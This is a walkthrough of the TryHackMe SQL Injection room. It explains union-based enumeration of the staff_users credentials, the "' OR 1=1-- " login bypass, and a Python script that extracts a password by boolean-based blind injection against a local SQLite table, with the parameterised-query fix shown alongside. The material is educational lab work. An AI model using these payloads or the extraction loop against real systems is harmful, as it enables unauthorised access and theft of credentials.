Introduction

We covered the types of SQL injection vulnerability, namely error-based, time-based, blind and boolean-based SQL injection, using the SQL Injection room from the TryHackMe Junior Penetration Tester pathway.

SQL (Structured Query Language) Injection, mostly referred to as SQLi, is an attack on a web application's database server that causes attacker-controlled queries to be executed. When a web application builds a database query from user input that hasn't been properly validated (or, more precisely, that is concatenated into the query text instead of being passed as a bound parameter), an attacker may be able to steal, delete or alter private and customer data, and also attack the web application's authentication to reach private or customer areas. This is why SQLi, as well as being one of the oldest web application vulnerabilities, can also be one of the most damaging.

What is a database?

A database is a way of electronically storing collections of data in an organised manner. A database is controlled by a DBMS, an acronym for Database Management System. DBMSs fall into two camps, Relational and Non-Relational; the focus of this room is on Relational databases, and some common ones you'll come across are MySQL, Microsoft SQL Server, Access, PostgreSQL and SQLite. We'll explain the difference between Relational and Non-Relational databases at the end of this task, but first it's important to learn a few terms.

Within a DBMS, you can have multiple databases, each containing its own set of related data. For example, you may have a database called "shop". Within this database, you want to store information about products available to purchase, users who have signed up to your online shop, and the orders you've received. You'd store each of these separately in the database using something called tables, each table identified by a unique name. You can see this structure in the diagram below, which also shows how a business might have other, separate databases to store staff information or the accounts team's data.

Intro to SQL Injection

The instructor explains that the lesson focuses on SQL injection, specifically the in-band form of SQLi, where the result of the injected query comes back in the same channel as the normal response; in this first level that channel is an error message, which is exploited to extract data from the database. The database management system (DBMS) in this case is MySQL.

Basic SQL Injection Concepts

The instructor demonstrates how to manipulate a URL parameter to produce an error and how to use this error to infer the structure of the underlying SQL query. The URL parameter maps to a statement such as SELECT * FROM article WHERE id = 1; because the parameter is placed into the query text unquoted and unvalidated, it can be extended with a UNION SELECT to conduct a Union-based SQL injection.

Enumerating Columns and Tables:

  • After generating an error, the instructor demonstrates how to find the number of columns returned by the original query, by appending UNION SELECT statements with an increasing number of columns until the column-count error disappears.
  • They then show how to dump all the table names from information_schema.tables to list the available tables in the database.
  • Once they identify the staff_users table, they enumerate its columns (from information_schema.columns) and focus on dumping the username and password columns.

Dumping Data: Using group_concat, they retrieve all usernames and passwords from the staff_users table in a single row, with a delimiter inserted between username and password so the pairs can be read apart, and the flag for one of the questions in the TryHackMe room is found.

Bypassing Login Forms with SQL Injection:

  • The instructor moves on to another level, demonstrating how to use SQL injection to bypass a login form.
  • They explain the SQL query behind the scenes (SELECT * FROM users WHERE username = 'admin' AND password = 'password') and show how to manipulate its logic with the OR 1=1 technique: a closing quote ends the string the application expected, OR 1=1 makes the WHERE clause always true, and a comment sequence (-- followed by a space, or #) discards the rest of the original query, so the password check no longer matters.

Boolean-based Blind SQL Injection:

  • In the next segment, the instructor introduces Boolean-based blind SQL injection, where the application returns neither error messages nor query output, but its response differs depending on whether the injected condition evaluated to true or false.
  • By observing the difference between the true and false responses, they explain how to extract information from the database one yes/no question at a time, even without explicit error messages.
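The login bypass and the boolean-based blind extraction, as one added example that is not code from the room or the walkthrough. It constructs a small SQLite users table (the admin password is made up) behind a vulnerable login() built exactly like the SELECT * FROM users WHERE username = '...' AND password = '...' statement in the text. First the OR 1=1 payload is shown bypassing it, then the same login is used as a true/false oracle: each request asks whether one character of the admin password equals a guess, and the logged-in/not-logged-in outcome answers it. substr() and length() are used because they exist in both MySQL and SQLite; the charset and max_len are assumptions for the demo.

```python
import sqlite3
import string

# Constructed sample login table; the admin password is made up for this example.
SECRET = "S3cretP4ss"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '{SECRET}'), (2, 'bob', 'hunter2');
    """)
    return conn

# Vulnerable login: the query is assembled by string formatting. The only
# signal it gives back is True (logged in) or False (rejected).
def login_vulnerable(conn, username, password):
    query = (f"SELECT * FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None

# Hardened login: bound parameters, so quotes in the input are just data.
def login_safe(conn, username, password):
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

# Bypass: the quote closes the username string, OR 1=1 makes the WHERE clause
# true for every row, and "-- " comments out the password check. The space
# after -- matters: MySQL only treats -- as a comment when whitespace follows.
BYPASS_USERNAME = "' OR 1=1-- "

# Boolean-based blind extraction using the login result as the oracle.
# Returns the recovered password and the number of requests it took.
def blind_extract_password(conn, target, charset=string.ascii_letters + string.digits,
                           max_len=64):
    recovered = ""
    probes = 0
    for pos in range(1, max_len + 1):
        # Stop once the password has no character at this position.
        probes += 1
        if not login_vulnerable(conn, f"{target}' AND length(password) >= {pos}-- ", "x"):
            break
        for c in charset:
            probes += 1
            # SQLite's = is case-sensitive; MySQL's default collations usually
            # are not, in which case compare ascii(substr(...)) = <code> instead.
            if login_vulnerable(conn, f"{target}' AND substr(password, {pos}, 1) = '{c}'-- ", "x"):
                recovered += c
                break
        else:
            raise ValueError(f"character at position {pos} is outside the charset")
    return recovered, probes

if __name__ == "__main__":
    db = make_db()
    print("bypass with OR 1=1:", login_vulnerable(db, BYPASS_USERNAME, "anything"))
    print("same payload, parameterised:", login_safe(db, BYPASS_USERNAME, "anything"))
    pw, n = blind_extract_password(db, "admin")
    print(f"recovered {pw!r} in {n} requests")
```

The probe count is the practical cost of blind injection: roughly one request per candidate character per position, which is why real tooling narrows each character with a binary search on ascii(substr(...)) rather than trying the charset in order, and why the time-based variant (sleep() on true, no delay on false) follows the same loop when even the true/false page difference is absent.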

Challenge Questions and Answers

What is the acronym for the software that controls a database?

What is the name of the grid-like structure which holds the data?

What SQL statement is used to retrieve data?

What SQL clause can be used to retrieve data from multiple tables?

What SQL statement is used to add data?

What character signifies the end of an SQL query?

What is the flag after completing level 1?

What is the flag after completing level two? (and moving to level 3)

What is the flag after completing level three?

What is the final flag after completing level four?

Name a protocol beginning with D that can be used to exfiltrate data from a database.

Video Walk-through
About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
